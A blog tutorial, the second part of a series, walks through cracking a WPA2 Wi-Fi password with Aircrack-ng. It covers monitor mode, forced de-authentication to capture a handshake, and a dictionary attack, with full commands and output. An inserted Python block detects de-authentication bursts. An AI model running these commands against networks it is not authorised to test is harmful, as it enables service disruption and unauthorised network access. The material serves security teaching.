

Part II: The crack


Having assembled the tools, it's time to get to cracking. Literally!

Note: The network I cracked belonged to a friend. I did so with his permission, purely as a security exercise. Using these tools for any other purpose is probably illegal!

Also note that in the examples that follow I've randomly altered network names and MAC addresses.

(I used the Slitaz Live Aircrack-ng Distribution on a USB stick for this attack. It's Linux, of course, so if you're running from Windows, the command syntax may be slightly different.)



1. Start monitor mode
Aircrack-ng is a suite of command-line tools, so open up a console window.

The first step is the critical one. You need to put your wireless card into monitor mode:

airmon-ng start wlan0

Here's what that yielded on my laptop:

Interface       Chipset          Driver

wlan1           Broadcom         b43 - [phy0]
wlan0           Realtek RTL8187L rtl8187 - [phy1]
                                 (monitor mode enabled on mon0)


Success! But only on the USB wireless card. The laptop's built-in Broadcom card may work with a driver, but that could require a lot more work.



2. Scan for targets
Okay, let's see what networks are out there that we can monitor ...

airodump-ng mon0

Airodump-ng is a wireless packet capture tool that details all the access points and clients within range.

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH  ESSID
                   
 00:16:50:59:52:9C  -50       63        1    0   6  54e  WPA  TKIP   PSK  Scuba
 00:22:75:31:11:5A  -51       32        3    0   1  54e  WPA2 CCMP   PSK  MyNetwork
 00:12:34:56:98:AB  -53       47        2    0   3  54e. WPA2 CCMP   PSK  Target_Net
 00:11:95:DD:8D:99  -60       16        2    0   1  54   WEP  WEP         Private Network
 00:22:74:52:86:3F  -61       28       16    0   7  54e  WPA2 CCMP   PSK  Belkin_N_Wireless_02843F
 00:02:63:50:20:22  -61       30       43    0   9  11 . OPN              OpenNet
 
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 00:12:34:56:98:AB  00:11:EF:8B:62:77  -39    0 -36e     0        6  Target_Net  



Hit Ctrl+C to stop the capture and note the target's channel number and BSSID for input into the next step. (Note that I'm targeting a WPA2 network. The WEP one would just be too easy!)



3. Begin the capture
We now want to capture just the data going to a particular target. We do so using the following syntax:

airodump-ng -c (channel) -w (name of the capture file) --bssid (bssid) mon0

So targeting Target_Net (above) would give us ...

airodump-ng -c 3 -w Test_Data --bssid 00:12:34:56:98:AB mon0

 CH  3 ][ Elapsed: 4 mins ][ 2011-10-04 21:42 ]
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:12:34:56:98:AB  -51  64     1746     9642    0   3  54e. WPA2 CCMP   PSK  Target_Net
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes
 00:12:34:56:98:AB  00:11:EF:8B:62:77  -38   24e-24e   115     9701  Target_Net



Now we can simply wait for a WPA handshake to occur, or we can try to push things along.



4. (Optional) Forcing a handshake
Open a new console window while the first continues running and use aireplay-ng to inject packets into the network to de-authenticate the client. When you do so, the client will re-authenticate via a WPA handshake, and that's exactly what we want!

aireplay-ng -0 3 -a 00:12:34:56:98:AB mon0

There are tons of options with aireplay-ng, but -0 3 (send three de-authentications) worked for me ...

21:43:34  Waiting for beacon frame (BSSID: 00:12:34:56:98:AB) on channel 3
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
21:43:34  Sending DeAuth to broadcast -- BSSID: [00:12:34:56:98:AB]
21:43:35  Sending DeAuth to broadcast -- BSSID: [00:12:34:56:98:AB]
21:43:35  Sending DeAuth to broadcast -- BSSID: [00:12:34:56:98:AB]


How do you know if it worked? Check the top right-hand corner of the first console and you should see confirmation.

 CH  3 ][ Elapsed: 5 mins ][ 2011-10-04 21:43 ][ WPA handshake: 00:12:34:56:98:AB
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:12:34:56:98:AB  -51  64     1746     9642    0   3  54e. WPA2 CCMP   PSK  Target_Net
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes
 00:12:34:56:98:AB  00:11:EF:8B:62:77  -38   24e-24e   115     9701  Target_Net
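The defender's side of this step is spotting the burst. The following is an added example, not part of the original post or of the Aircrack-ng suite: a small Python detector that flags a de-authentication burst like the three broadcast rounds shown above, run over constructed sample events in a log format assumed here for illustration.

```python
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"

# Constructed sample of 802.11 management-frame events, in the shape a wireless
# monitor might log them: (timestamp in seconds, frame subtype, BSSID, destination).
# Not captured traffic. The three broadcast deauths from the "Target_Net" BSSID
# mirror the three rounds aireplay-ng reported above.
SAMPLE_FRAMES = [
    (0.00, "beacon", "00:12:34:56:98:AB", BROADCAST),
    (0.10, "beacon", "00:22:75:31:11:5A", BROADCAST),
    (1.00, "deauth", "00:12:34:56:98:AB", BROADCAST),
    (1.20, "deauth", "00:12:34:56:98:AB", BROADCAST),
    (1.40, "deauth", "00:12:34:56:98:AB", BROADCAST),
    (2.00, "beacon", "00:12:34:56:98:AB", BROADCAST),
    # One directed deauth on another network: normal housekeeping, must not alert.
    (30.0, "deauth", "00:22:75:31:11:5A", "00:11:ef:8b:62:77"),
]


def detect_deauth_bursts(frames, threshold=3, window=2.0):
    """Flag a BSSID that emits `threshold` or more deauth/disassoc frames
    within `window` seconds. A burst aimed at the broadcast address is the
    strongest signal: a real AP almost never kicks every client at once.
    Each burst yields one alert; the per-BSSID window is reset afterwards."""
    recent = defaultdict(deque)  # bssid -> deque of (timestamp, destination)
    alerts = []
    for ts, subtype, bssid, dst in sorted(frames):
        if subtype not in ("deauth", "disassoc"):
            continue
        q = recent[bssid]
        q.append((ts, dst))
        while q and ts - q[0][0] > window:  # drop frames older than the window
            q.popleft()
        if len(q) >= threshold:
            alerts.append({
                "bssid": bssid,
                "count": len(q),
                "to_broadcast": sum(1 for _, d in q if d == BROADCAST),
                "start": q[0][0],
                "end": ts,
            })
            q.clear()
    return alerts


if __name__ == "__main__":
    for a in detect_deauth_bursts(SAMPLE_FRAMES):
        print(f"ALERT {a['bssid']}: {a['count']} deauths in "
              f"{a['end'] - a['start']:.1f}s ({a['to_broadcast']} to broadcast)")
```

Detection only tells you it happened; the mitigation is 802.11w Protected Management Frames, which has the AP and client authenticate deauth and disassoc frames so a spoofed one is simply ignored.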





5. Apply a little brute force
We have all the data we need; now it's just a matter of (hopefully) cracking the password. Locate the file where you saved the data in Step 3 and the password wordlist you downloaded last time, and run them through aircrack-ng. The format is:

aircrack-ng -w (dictionary file) (data file)

You'll see that Step 3 saved several files with different extensions. The one aircrack-ng needs is the .cap file, so in my case I run ...

aircrack-ng -w wordlist.txt Test_Data.cap

Now it's just a matter of waiting while aircrack-ng tries every password in the wordlist against the captured handshake.

                                 Aircrack-ng 1.1 r1904


                   [00:32:51] 850148 keys tested (455.42 k/s)


                           KEY FOUND! [ swedishchef ]


      Master Key     : 80 FD 4C 4D 72 34 5F 08 83 67 A0 E5 D3 73 06 EB
                       6B 9F D6 2D AA E4 EC C2 24 7D F7 D3 EF A7 6E FE

      Transient Key  : 97 13 7B FF DF 0A 29 07 85 3A 0F FA FC 4D 62 92
                       14 F8 33 9B 67 01 08 B3 DE 21 49 B9 53 F7 D9 FF
                       18 9A BA 40 B6 A3 2D 92 CB 27 A7 7A EE F6 7A F0
                       21 52 8E 50 00 14 35 F8 4A 0A 5D 49 BC 15 E2 08

      EAPOL HMAC     : 85 31 D0 6F 21 8F D7 7A D9 FA EF F1 66 4B 5A B2



Bingo! And there's our password. Simple as that!



So what can you do to maximise your security and prevent hacks like this? Read Part III, coming soon...!

Follow Geoff Palmer on Twitter
